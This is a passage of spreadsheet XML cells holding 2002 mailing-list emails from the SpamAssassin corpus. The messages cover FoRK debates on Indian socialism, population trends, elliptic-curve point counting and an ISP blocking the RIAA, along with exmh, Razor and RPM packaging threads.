Message-----\nFrom: Eugen Leitl [mailto:eugen@leitl.org]\nSent: Monday, August 19, 2002 1:34 AM\nTo: Rob Shavell\nCc: fork@spamassassin.taint.org\nSubject: Re: sprint delivers the next big thing??\n\n\nOn Sun, 18 Aug 2002, Rob Shavell wrote:\n\n&gt; down in the tech world than mobile visual communications.. and yet no one\n&gt; seems to give much of a damn that right now that 2 persons can take photos\n&gt; and share them instantly across space.  this is one of the biggest - and\n\nThe word "trivial" comes to mind.\n\n&gt; last - fundamental changes in human communications.  will be as big as the\n&gt; browser.\n\nRemote realtime streaming video is neat, but sharing pictures? You invoke\nbig words rather readily.\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Chris Garrigues &lt;cwg-dated-1030314468.7c7c85@DeepEddy.Com&gt;\nFrom: Valdis.Kletnieks@vt.edu\nDate: Tue, 20 Aug 2002 22:51:52 -0400</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 22:51:52 -0400</t>
  </si>
  <si>
    <t>--==_Exmh_-603961349P Content-Type: text/plain; charset=us-ascii On Tue, 20 Aug 2002 17:27:47 CDT, Chris Garrigues   said: &gt; For those who have other sequences defined, the window will widen to display  &gt; the other sequences.  Preferences allow you to say if you want a given  &gt; sequence display to never show or to always show. Ever tried to get MH to *not* have a 'pseq' sequence?  I suspect everybody's looking at a big box that has unseen and pseq in it.  Might want to add 'pseq' to the 'hide by default' list.... --  				Valdis Kletnieks 				Computer Systems Senior Engineer 				Virginia Tech --==_Exmh_-603961349P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux) Comment: Exmh version 2.5 07/13/2001 iD8DBQE9YwBHcC3lWbTT17ARApjqAJ9Er8DBC1yim8a6rlFa5tFs2vY0MACg6U55 WPaWcJZN9Ma23u7ObQIKqt4= =Ee1L -----END PGP SIGNATURE----- --==_Exmh_-603961349P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: harley@argote.ch (Robert Harley)\nDate: Tue, 20 Aug 2002 20:24:12 +0200 (CEST)</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 20:24:12 +0200 (CEST)</t>
  </si>
  <si>
    <t>RAH quoted:\n&gt;Indians are not poor because there are too many of them; they are poor\n&gt;because there are too many regulations and too much government intervention\n&gt;-- even today, a decade after reforms were begun. India's greatest problems\n&gt;arise from a political culture guided by socialist instincts on the one\n&gt;hand and an imbedded legal obligation on the other hand.\n\nNice theory and all, but s/India/France/g and the statements hold just\nas true, yet France is #12 in the UN's HDI ranking, not #124.\n\n\n&gt;Since all parties must stand for socialism, no party espouses\n&gt;classical liberalism\n\nI'm not convinced that that classical liberalism is a good solution\nfor countries in real difficulty.  See Joseph Stiglitz (Nobel for\nEconomics) on the FMI's failed remedies.  Of course googling on\n"Stiglitz FMI" only brings up links in Spanish and French.  I guess\nthat variety of spin is non grata in many anglo circles.\n\n\nR\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "Gordon Mohr" &lt;gojomo@usa.net&gt;\nDate: Tue, 20 Aug 2002 20:00:20 -0700</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 20:00:20 -0700</t>
  </si>
  <si>
    <t>Ian Andrew Bell writes:\n&gt; I think that this and other articles confuse Socialism with \n&gt; Bureaucracy.  Libertarianism as implemented in North America is not \n&gt; exactly the shining pinnacle of economic efficiency.\n\nLibertarianism is implemented in North America? Where?!?!?\n\n&gt; Just try starting a telephone company in the US or (even worse) \n&gt; Canada.  It can take a year or more to get the blessing of our own \n&gt; "Permit Rajs" at the FCC, PUC, and PTTs (or, in the decidedly more \n&gt; socialist leaning Canada, Industry Canada and the CRTC).\n\nTelecom regulations are an example of implemented Libertarianism?\n\nAnd for how screwed up North America's telecom industries and\nregulators are, they're better than much of the rest of the\nworld, where it doesn't just "take a year or more" to get\nstarted: it's impossible/illegal. \n\nMatters of degree, matter.\n\n&gt; Yet, despite all of this intense regulation and paper pushing, as \n&gt; well as regulatory scrutiny by the FTC, SEC, and IRS, the \n&gt; executives of Telecom Companies have managed to bilk the investment \n&gt; community for what looks to be tens of billions of dollars.  They \n&gt; finished their routine with the a quadruple lutz -- laying off \n&gt; hundreds of thousands of workers when it all came crashing down.\n&gt; \n&gt; So.. tell me again.. how are we better off?\n\nWe can lose billions of dollars, and have hundreds of thousands of \npeople laid off... and after it all, our diets, health, longevity, \nand freedom to pursue activities of our own choosing are still the \nenvy of billions of people. \n\nWould you rather be unemployed, broke, and in possession of career\nskills which merely match the local average in:\n\n  - North America, or \n  - India/Peru/Egypt/Philippines/etc\n\n????\n\n- Gordon\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: &lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: "Alexander Meis" &lt;am@simoon.de&gt;\nDate: Tue, 20 Aug 2002 19:37:34 +0200</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 19:37:34 +0200</t>
  </si>
  <si>
    <t>"Alexander Meis" &lt;am@simoon.de&gt;</t>
  </si>
  <si>
    <t>[SAtalk] SpamAssassin an Razor problem</t>
  </si>
  <si>
    <t>Hi....\n\ni installed razor an SpamAssassin on an redhat 6.3 with a fresh per 5.8.0.\nwhen I install Mail::SpamAssassin using the CPAN the followin error in make\ntest appears.\n\nt/forged_rcvd...........ok\nt/nonspam...............ok\nt/razor.................        Test skipped: Razor is not installed.\nt/razor.................ok\n        2/2 skipped: Razor is not installed.\nt/reportheader..........ok\n\nHow can i get the razor running with the SpamAssassin ?\n\nThanks for helping\n\nAlex\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Digital Bearer Settlement List &lt;dbs@philodox.com&gt;, fork@spamassassin.taint.org\nFrom: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nDate: Tue, 20 Aug 2002 19:36:15 -0400</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 19:36:15 -0400</t>
  </si>
  <si>
    <t>Experts Scale Back Estimates of World Population Growth</t>
  </si>
  <si>
    <t>The demographic transition, where birthrates are lowered by increased life expectancy, seems to be happening faster than the experts have anticipated. I attribute this apparently precipitous decline in "sustainable" development to the twin evils of increasing personal freedom and economic globalization. Somebody oughta pass a law to prevent those things, of course, before it's too late. The People's way of life *must* be preserved in its natural, pre-industrial state, or we'll lose it forever. ;-). Cheers, RAH [URL]http://www.nytimes.com[/URL] The New York Times August 20, 2002 Experts Scale Back Estimates of World Population Growth By BARBARA CROSSETTE Demography has never been an exact science. Ever since social thinkers began trying to predict the pace of population growth a century or two ago, the people being counted have been surprising the experts and confounding projections. Today, it is happening again as stunned demographers watch birthrates plunge in ways they never expected. Only a few years ago, some experts argued that economic development and education for women were necessary precursors for declines in population growth. Today, village women and slum families in some of the poorest countries are beginning to prove them wrong, as fertility rates drop faster than predicted toward the replacement level - 2.1 children for the average mother, one baby to replace each parent, plus a fraction to compensate for unexpected deaths in the overall population. A few decades ago in certain countries like Brazil, Egypt, India and Mexico fertility rates were as high as five or six. As a result, United Nations demographers who once predicted the earth's population would peak at 12 billion over the next century or two are scaling back their estimates. Instead, they cautiously predict, the world's population will peak at 10 billion before 2200, when it may begin declining. Some experts are wary of too much optimism, however. At the Population Council, an independent research organization in New York, Dr. John Bongaarts has studied population declines in various countries over the last half century. He questions the assumption that when fertility declines begin they will continue to go down at the same pace, especially if good family planning services are not widely available. Sharp fertility declines in many industrialized and middle-income countries had already challenged another old belief: that culture and religion would thwart efforts to cut fertility. In Italy, a Roman Catholic country whose big families were the stuff of cinema, family size is shrinking faster than anywhere else in Europe, and the population is aging rapidly as fewer children are born. Islamic Iran has also had great success with family planning. "Projections aren't terribly accurate over the long haul," said Dr. Nicholas Eberstadt, a demography expert at the American Enterprise Institute in Washington. "Demographers have been surprised by just about every big fertility change in the modern period. Demographers didn't anticipate the baby boom. They did not anticipate the subsequent decline in fertility in industrialized Western democracies." What's next? Demographers can agree generally on a few measurable facts and some trends. The world's population, now 6.2 billion, quadrupled in the 20th century, and changed in drastic ways. In 1900, 86 percent of the world's people lived in rural areas and about 14 percent in urban areas. By 2000, urban communities were home to 47 percent of the population, with 53 percent still in the countryside. Between now and 2030, when the global population is expected to reach about eight billion, almost all the growth will be in cities. But urbanization is not necessarily a bad thing for the environment, said Dr. Joseph Chamie, director of the United Nations' population division. "Moving to cities frees up the land for forestry, agriculture and many other activities," Dr. Chamie said. "You're getting people concentrated, so you can probably recycle more easily. People change their lifestyles. The Indian moving from the boonies of Uttar Pradesh to the city of Lucknow gets educational opportunities, cultural opportunities, all sorts of political participation. He can be influenced by advertising and public relations campaigns. Immunization will be better, and family planning." As births fall and lives are extended, the global population is getting older. The over-80 age group is the fastest growing. But not everywhere. For example, the United Nations calculates that life expectancy at birth is being slashed in countries hardest hit by AIDS. In South Africa, the life of a baby born now should be 66 years; AIDS has cut that to 47. In Zimbabwe, the drop has been to 43 years from 69. In Botswana, it is 36 years, down from 70. Another cautionary sign from projections is that where populations are continuing to grow fastest, societies and governments may be least likely to cope with the results, including strains on natural resources - farmland, water, air, forests and animals. Last year, the organization published a report and wall chart, "Population, Environment and Development," plotting and analyzing population changes as its contribution to the debate surrounding the Johannesburg summit meeting. The United Nations estimates that the world's current population, 6.2 billion, is growing at an annual rate slightly over 1.2 percent, producing some 77 million people. Of this growth, 97 percent is taking place in less-developed countries, said Dr. Chamie, whose position at the United Nations makes him chief keeper of the world's statistics. Six nations will dominate this growth, and in this order: India, China, Pakistan, Nigeria, Bangladesh and Indonesia. Thus, though fertility is declining unexpectedly in a poor country like India, which has more than a billion people, the actual numbers continue to rise rapidly because the base is so large. India is gaining as many people annually as China, Pakistan and Nigeria combined, the United Nations says. India is projected to have at least 100 million more people than China by 2050, even if China's one-child policy is relaxed. Small families are now the norm for the Chinese, whose standard of living has risen above that of the people of India by many measures. Among industrialized countries, the United States alone has a growth rate comparable to that of developing nations. It now ranks seventh in growth, Dr. Chamie said, but 80 percent of that growth comes from immigration. In Europe, populations are shrinking, even with more immigration. With much of the population bulge predicted in Asia, the East-West Center in Honolulu has just published a report, "The Future of Population in Asia," which finds cause to fear considerable environmental stress in a region where population densities and numbers are often great. Asia, the report notes, already has 56 percent of the world's population living on 31 percent of its arable land, and more than 900 million people exist on less than $1 a day. "Asia faces the most acute pressure on arable agricultural land of any region in the world," the report says, adding that expansion of farmland has been made at the cost of forests. Acute water scarcity, a significant loss of biodiversity and more urban pollution seem inevitable. Twelve of the world's 15 most polluted cities are in Asia. By 2020, the report predicts, Asia will be producing more carbon dioxide emissions than any other region. "When looking at current and future environmental concerns in Asia," the report concludes, "the number of people to be fed, clothed, housed, transported, educated and employed may not be the only issue, but it is an issue that cannot be ignored."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URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.nytimes.com http://xent.com</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Tue, 20 Aug 2002 19:26:13 +0200</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 19:26:13 +0200</t>
  </si>
  <si>
    <t>Re: when building a rpm i386-redhat-linux- is appended to man page</t>
  </si>
  <si>
    <t>Once upon a time, Harig, wrote : &gt; I've found that the solution is to %define the needed values before &gt; calling %configure, for example, &gt;  &gt; %define _prefix     /your/local/prefix &gt; %define _includedir /your/local/prefix/include/%{name} &gt; %configure  &amp;&amp;  %__make &gt;  &gt; If you follow the steps above, then %makeinstall can be called &gt; without any overrides, which is a relatively nice, clean solution. You're absolutely right... and come to think of it, I must have done it that way in fact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lt;fork@spamassassin.taint.org&gt;\nFrom: "John Hall" &lt;johnhall@evergo.net&gt;\nDate: Tue, 20 Aug 2002 18:40:30 -0700</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 18:40:30 -0700</t>
  </si>
  <si>
    <t>The question is why are they still poor? Especially given the success of Indian immigrants in other societies? South Korea was a lot poorer after the Korean war than Ghana when it gained its independence at about the same time.  That was after India gained independence, and Korea couldn't have been in better shape at that point than India (my impression). &gt; -----Original Message----- &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of &gt; sateesh narahari &gt; Sent: Tuesday, August 20, 2002 12:44 PM &gt; To: fork@spamassassin.taint.org &gt; Subject: Re: The Curse of India's Socialism &gt;  &gt; All good arguments, except till you realize that &gt; majority of indians were poor even before &gt; independence. &gt;  &gt; Sateesh &gt;  &gt;  &gt; --- "R. A. Hettinga"  wrote: &gt; &gt; &gt; [URL]http://online.wsj.com[/URL],,SB1029790639190441115,00.html &gt; &gt; &gt; &gt; &gt; &gt; The Wall Street Journal &gt; &gt; &gt; &gt; August 20, 2002 &gt; &gt; COMMENTARY &gt; &gt; &gt; &gt; The Curse of India's Socialism &gt; &gt; &gt; &gt; By CHRISTOPHER LINGLE &gt; &gt; &gt; &gt; In a classic case of deflecting blame for their own &gt; &gt; shortcomings, &gt; &gt; politicians in India have identified the size of the &gt; &gt; population as the &gt; &gt; country's biggest problem. This position was stated &gt; &gt; in a unanimous &gt; &gt; parliamentary resolution passed on the 50th &gt; &gt; anniversary of independence. &gt; &gt; Half a decade later, it is a belief that still &gt; &gt; resonates with many. Yet it &gt; &gt; is hard to imagine a more cynical view. If left free &gt; &gt; from the extensive &gt; &gt; interference of various levels of government, the &gt; &gt; energy and creativity of &gt; &gt; the Indian people could soon allow them to be among &gt; &gt; the richest on earth. &gt; &gt; &gt; &gt; Indians are not poor because there are too many of &gt; &gt; them; they are poor &gt; &gt; because there are too many regulations and too much &gt; &gt; government intervention &gt; &gt; -- even today, a decade after reforms were begun. &gt; &gt; India's greatest problems &gt; &gt; arise from a political culture guided by socialist &gt; &gt; instincts on the one &gt; &gt; hand and an imbedded legal obligation on the other &gt; &gt; hand. &gt; &gt; &gt; &gt; While India's political culture reflects the beliefs &gt; &gt; of its founding &gt; &gt; fathers, there is the additional matter of the &gt; &gt; modified preamble to its &gt; &gt; constitution that specifies: "India is a sovereign, &gt; &gt; secular, socialist &gt; &gt; republic." It was Indira Gandhi who had the words &gt; &gt; "socialist" and "secular" &gt; &gt; added in the late 1970s. At the same time, she also &gt; &gt; amended the relevant &gt; &gt; section in the Representation of Peoples Act to &gt; &gt; require that all recognized &gt; &gt; and registered parties swear by this preamble. Since &gt; &gt; all parties must stand &gt; &gt; for socialism, no party espouses classical &gt; &gt; liberalism (yet there are &gt; &gt; numerous communist parties). &gt; &gt; &gt; &gt; While one can appreciate the difficulty of &gt; &gt; abandoning ideas with such &gt; &gt; honored lineage, the fact that socialism has been &gt; &gt; widely discredited and &gt; &gt; abandoned in most places should prompt Indians to &gt; &gt; reconsider this &gt; &gt; commitment. Despite evidence of its failure as an &gt; &gt; economic system, many of &gt; &gt; the socialists who carry on do so by trying to &gt; &gt; proclaim that their dogma &gt; &gt; reinforces certain civic virtues. A presumed merit &gt; &gt; of socialism is that it &gt; &gt; aims to nurture a greater sense of collective &gt; &gt; identity by suppressing the &gt; &gt; narrow self-interest of individuals. However, this &gt; &gt; aspect of socialism lies &gt; &gt; at the heart of its failure both as a political tool &gt; &gt; as well as the basis &gt; &gt; for economic policy. &gt; &gt; &gt; &gt; Let's start with the economic failures of socialism. &gt; &gt; Most of the grand &gt; &gt; experiments have been ignominiously abandoned or &gt; &gt; recast in tortured terms &gt; &gt; such as the "Third Way" that defer to the importance &gt; &gt; of markets and &gt; &gt; individual incentives. Unfortunately, it took a &gt; &gt; great deal of human &gt; &gt; suffering before socialists abandoned their goal of &gt; &gt; trying to create an &gt; &gt; economic system on the basis of collective goals. &gt; &gt; &gt; &gt; Socialist ideologues are impervious to evidence that &gt; &gt; their system inspires &gt; &gt; even more human misery in the civic realm. This is &gt; &gt; because socialism &gt; &gt; provides the political mechanism for and legitimacy &gt; &gt; by which people &gt; &gt; identify as members of groups. While it may suit the &gt; &gt; socialist agenda to &gt; &gt; create them-and-us scenarios relating to workers and &gt; &gt; capitalists or &gt; &gt; peasants and urban dwellers, this logic is readily &gt; &gt; converted to other types &gt; &gt; of divisions. &gt; &gt; &gt; &gt; In the case of India, competition for power has &gt; &gt; increasingly become &gt; &gt; identified with religiosity or ethnicity, as is &gt; &gt; evident by the rise of the &gt; &gt; Bharatiya Janata Party, supported by radical &gt; &gt; Hindutva supporters. As &gt; &gt; elsewhere, political parties based on religion are &gt; &gt; by their very nature &gt; &gt; exclusionary. These narrow concepts of identity work &gt; &gt; against nation &gt; &gt; building since such a politics forces arrangements &gt; &gt; that cannot accommodate &gt; &gt; notions of universal values. &gt; &gt; &gt; &gt; Socialism also sets the stage for populist promises &gt; &gt; of taking from one &gt; &gt; group to support another. This variety of political &gt; &gt; posturing by the &gt; &gt; Congress Party was used to build a coalition of &gt; &gt; disaffected minorities. In &gt; &gt; turn, the BJP built its power base on a promise to &gt; &gt; restore power to Hindus. &gt; &gt; And so it is that India's heritage of socialist &gt; &gt; ideology provided the &gt; &gt; beginnings of a political culture that evolved into &gt; &gt; sectarian populism that &gt; &gt; has wrought cycles of communal violence. Populism &gt; &gt; with its solicitations of &gt; &gt; political patronage, whether based upon nationalism &gt; &gt; or some other ploy, is &gt; &gt; also open to the sort of rampant corruption so &gt; &gt; evident in India. &gt; &gt; &gt; &gt; At issue in India is nothing less than the role of &gt; &gt; the state. Should it be &gt; &gt; used as a mechanism to protect the freedom and &gt; &gt; rights of individuals? Or &gt; &gt; should the state be a vehicle for groups to gain &gt; &gt; power? It should be clear &gt; &gt; the latter approach would lead to the destruction of &gt; &gt; India's democracy &gt; &gt; while the former will allow it to survive. &gt; &gt; &gt; &gt; It is undeniable that India's public policy guided &gt; &gt; by socialism has &gt; &gt; promoted divisions that contributed to social &gt; &gt; instability and economic &gt; &gt; destruction. This dangerous game has only served the &gt; &gt; narrow interests of &gt; &gt; those who seek to capture or preserve power. That &gt; &gt; India is a "socialist" &gt; &gt; state, specified in a preamble to the constitution, &gt; &gt; makes this binding &gt; &gt; commitment evident in the nature of interventionist &gt; &gt; policies that have &gt; &gt; wrought slower economic growth causing great harm to &gt; &gt; the poor and unskilled &gt; &gt; who have lost access to economic opportunities. &gt; &gt; Socialism also introduced &gt; &gt; forces that are destroying India's hard-earned &gt; &gt; democracy. A paradigm shift &gt; &gt; in the nature of Indian politics is needed so the &gt; &gt; state ceases serving as a &gt; &gt; mechanism for groups to gain power and instead &gt; &gt; becomes an instrument to &gt; &gt; secure rights and freedoms for individuals. &gt; &gt; &gt; &gt; Mr. Lingle is professor of economics at Universidad &gt; &gt; Francisco Marroquin in &gt; &gt; Guatemala, and global strategist for &gt; &gt; eConoLytics.com. &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; -- &gt; &gt; ----------------- &gt; &gt; R. A. Hettinga  &gt; &gt; The Internet Bearer Underwriting Corporation &gt; &gt;  &gt; &gt; 44 Farquhar Street, Boston, MA 02131 USA &gt; &gt; "... however it may deserve respect for its &gt; &gt; usefulness and antiquity, &gt; &gt; [predicting the end of the world] has not been found &gt; &gt; agreeable to &gt; &gt; experience." -- Edward Gibbon, 'Decline and Fall of &gt; &gt; the Roman Empire' &gt; &gt; [URL]http://xent.com[/URL] &gt;  &gt;  &gt; __________________________________________________ &gt; Do You Yahoo!? &gt; HotJobs - Search Thousands of New Jobs &gt; [URL]http://www.hotjobs.com[/URL] &gt; [URL]http://xent.com[/URL] [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://online.wsj.com http://xent.com http://www.hotjobs.com http://xent.com http://xent.com</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: harley@argote.ch (Robert Harley)\nDate: Tue, 20 Aug 2002 18:24:44 +0200 (CEST)</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 18:24:44 +0200 (CEST)</t>
  </si>
  <si>
    <t>Re: # Elliptic Curve Point Counting, made easy</t>
  </si>
  <si>
    <t>Gordon Mohr wrote:\n&gt;Does this mean that Eliptic Curve encryption is\n&gt;now easily breakable? Or faster than before with\n&gt;no loss in strength? Or stronger?\n&gt;\n&gt;Raw bits are OK, cooked bits are better.\n \nOh.  OK.\n \nThese results don't help break EC crypto at all.\n \nWith RSA, you pick a number with secret factors and to break the\ncryptosystem, you can factor the number.  Due to fast sub-exponential\nalgorithms for factoring, the number had better be 1024 bits at the\nvery least (record = 524 bits).\n \nWith EC, you pick a curve and pick points on the curve with secret\ndiscrete logarithm.  To break the cryptosystem you can compute a\ndiscrete log but the best algorithms for random curves are exponential\n(record = 109 bits, for a slightly special curve).\n \nUp until now, people pick curves chosen from a small fixed set.  One\nchoice is a few curves with special properties that originally were\nchosen to make point-counting easier, and can also speed up the crypto\noperations, but in some cases they can also speed up attacks, not on\ncurves deployed at the moment but the danger exists.  The other\nchoice is to precompute a handful of random curves.  The NSA did this\na few years ago when it took hours on a fast machine and NIST\nstandardized those curves.\n \nWhat changes is that it is now possible is to generate your own curves\non an ordinary PC.  This has been getting easier and easier, with\nsmall curves taking seconds on a fast machine since a year or two.\nNow even reasonably big curves take seconds on a typical PC.\n \nThis means that you don't have to rely on standard curves but can\ndistribute risk over many curves in case some get broken at some\nstage.  In certain circumstances you can even keep the curve itself\nsecret so an attacker doesn't know which discrete log to try to\ncompute!  There isn't really a good analogy with RSA, but imagine\nwanting to factor a number and you don't even know what it is...\n \nSo basically recent progress has made new things feasible and this\nmakes them even more so.  The underlying primitives for signing,\nencoding and so on are not affected, but the security vibes get better.\n \nR\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: "Russell Turpin" &lt;deafbox@hotmail.com&gt;\nDate: Tue, 20 Aug 2002 17:36:56 +0000</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 17:36:56 +0000</t>
  </si>
  <si>
    <t>Joseph S. Barrera III:\n&gt;I just use the free/adware version of Opera. I mean,\n&gt;half the pages I look at have ads on them anways ..\n\nI didn't mind the ads. The problem is that the ad\nserver Opera puts on your machine is a PIG. Every\ntime it goes to change the ad, it thrashes my\nlaptop for thirty seconds. So no, I don't mind\nthe ad, but I do mind that serving ads cripples\nthe browser.\n\nAlas, Mozilla is also a PIG. So I'm back to using\nIE, which seems to be the only free, reasonably\nfeatured browser that runs decently on my laptop.\nI'm open to alternatives ..\n\n\n\n_________________________________________________________________\nMSN Photos is the easiest way to share and print your photos: \n[URL]http://photos.msn.com[/URL]\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://photos.msn.com http://xent.com</t>
  </si>
  <si>
    <t>To: exmh-workers@spamassassin.taint.org\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Tue, 20 Aug 2002 17:27:47 -0500</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 17:27:47 -0500</t>
  </si>
  <si>
    <t>New Sequences Window</t>
  </si>
  <si>
    <t>--==_Exmh_-1828408717P\nContent-Type: text/plain; charset=us-ascii\n\nI've just checked in a rather large patch which replaces the Unseen Window \nwith a new Sequences Window.\n\nSince the preference items are different, you'll need to turn the display of \nthe sequences window on in the preferences even if you had the unseen window \nenabled.  I couldn't figure out how to default the preferences to match the \nunseen window.\n\nI'm hoping that all people with no additional sequences will notice are purely \ncosmetic changes.\n\nFor those who have other sequences defined, the window will widen to display \nthe other sequences.  Preferences allow you to say if you want a given \nsequence display to never show or to always show.\n\nI've also changed the ftoc colorization as discussed briefly on the list a \nweek or so ago.\n\nThe two things that I know I need to do are to fix the performance issue that \nI think is what Anders was seeing yesterday and to catch the documentation up \nwith the code.\n\nMy wife is out for an "evening with the girls" tonight, so I should be able to \nwork on the performance issue tonight and check it in after some testing in a \nday or two.\n\nI hope I didn't break very much with all the changes I made...\n\nChris\n\n-- \nChris Garrigues                 [URL]http://www.DeepEddy.Com[/URL]\nvirCIO                          [URL]http://www.virCIO.Com[/URL]\n716 Congress, Suite 200\nAustin, TX  78701		+1 512 374 0500\n\n  World War III:  The Wrong-Doers Vs. the Evil-Doers.\n\n\n\n\n--==_Exmh_-1828408717P\nContent-Type: application/pgp-signature\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.6 (GNU/Linux)\nComment: Exmh version 2.2_20000822 06/23/2000\n\niD8DBQE9YsJjK9b4h5R0IUIRAlPcAJwOagra2EcjW/IcjmIB0RNkKUUXUQCfapbo\ne4f/pt3xlgPvgzpJ94HmwP0=\n=YPYq\n-----END PGP SIGNATURE-----\n\n--==_Exmh_-1828408717P--\n\n\n\n_______________________________________________\nExmh-workers mailing list\nExmh-workers@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: bitbitch@magnesium.net\nFrom: Owen Byrne &lt;owen@permafrost.net&gt;\nDate: Tue, 20 Aug 2002 16:30:38 -0300</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 16:30:38 -0300</t>
  </si>
  <si>
    <t>Re: This little domain went to China....</t>
  </si>
  <si>
    <t>bitbitch@magnesium.net wrote: &gt;The RIAA continues to amaze me.    Everyone might want to grok the &gt;news yahoo has: &gt; &gt;[URL]http://rd.yahoo.com[/URL]*[URL]http://Listen4ever.com[/URL] &gt; &gt; &gt;And if you're really bored, go ahead and read the papers that were &gt;filed by the RIAA against the major backbone providers. &gt; &gt;[URL]http://www.riaa.com[/URL] &gt; &gt; &gt; &gt; &gt;A very disgruntled, &gt; &gt;bitbitch &gt; &gt; &gt;[URL]http://xent.com[/URL] &gt; Well perhaps this little tidbit of sanity will make you (slightly) more  gruntled: [URL]http://www.informationwave.net[/URL] ---------------------------------------------------------- *IWT Bans RIAA From Accessing Its Network* *August 19, 2002* Information Wave Technologies has announced it will actively deny the  Recording Industry Association of America (RIAA) from accessing the  contents of its network. Earlier this year, the RIAA announced its new  plan to access computers without owner's consent for the sake of  protecting its assets. Information Wave believes this policy puts its  customers at risk of unintentional damage, corporate espionage, and  invasion of privacy to say the least. Due to the nature of this matter and RIAA's previous history, we feel  the RIAA will abuse software vulnerabilities in a client's browser after  the browser accesses its site, potentially allowing the RIAA to access  and/or tamper with your data. Starting at midnight on August 19, 2002,  Information Wave customers will no longer be able to reach the RIAA's  web site. Information Wave will also actively seek out attempts by the  RIAA to thwart this policy and apply additional filters to protect our  customers' data. Information Wave will also deploy peer-to-peer clients on the Gnutella  network from its security research and development network (honeynet)  which will offer files with popular song titles derived from the  Billboard Top 100 maintained by VNU eMedia. No copyright violations will  take place, these files will merely have arbitrary sizes similar to the  length of a 3 to 4 minute MP3 audio file encoded at 128kbps. Clients  which connect to our peer-to-peer clients, and then afterwards attempt  to illegally access the network will be immediately blacklisted from  Information Wave's network. The data collected will be actively  maintained and distributed from our network operations site. The placement of this policy is not intended to hamper the RIAA's piracy  elimination agenda or advocate Internet piracy, but to ensure the safety  of our customers' data attached to our network from hackers or corporate  espionage hidden by the veil of RIAA copyright enforcement. If you have questions, comments, or concerns regarding this policy,  please e-mail riaa@informationwave.net . ---------------------------------------------------------------------------------- Owen [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://rd.yahoo.com http://Listen4ever.com http://www.riaa.com http://xent.com http://www.informationwave.net http://xent.com</t>
  </si>
  <si>
    <t>To: Matt Bernstein &lt;mb/vipul@dcs.qmul.ac.uk&gt;\nFrom: Vipul Ved Prakash &lt;mail@vipul.net&gt;\nDate: Tue, 20 Aug 2002 16:12:51 -0700</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 16:12:51 -0700</t>
  </si>
  <si>
    <t>Matt Bernstein &lt;mb/vipul@dcs.qmul.ac.uk&gt;</t>
  </si>
  <si>
    <t>Re: [Razor-users] when aggregator?</t>
  </si>
  <si>
    <t>On Tue, Aug 20, 2002 at 05:47:54PM +0100, Matt Bernstein wrote:\n&gt; [URL]http://razor.sourceforge.net[/URL] says "Aggregator will be \n&gt; released with the next major release of Razor2 agents." I was told "soon" \n&gt; several months ago--has it stalled, or been released? If the former, can I \n&gt; grab a development snapshot to test for you?\n&gt; \n&gt; Matt\n\nThe aggregator has been pushed back on the priority list because more\nimportant things cropped up. I can't give you an ETA on it, but it's\nvery much on the TODO list.\n\ncheers,\nvipul.\n\n-- \n\nVipul Ved Prakash          |   "The future is here, it's just not \nSoftware Design Artist     |    widely distributed."\n[URL]http://vipul.net[/URL]          |              -- William Gibson\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://razor.sourceforge.net http://vipul.net https://www.inphonic.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: Digital Bearer Settlement List &lt;dbs@philodox.com&gt;,\nFrom: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nDate: Tue, 20 Aug 2002 15:52:50 -0400</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 15:52:50 -0400</t>
  </si>
  <si>
    <t>IWT Bans RIAA From Accessing Its Network</t>
  </si>
  <si>
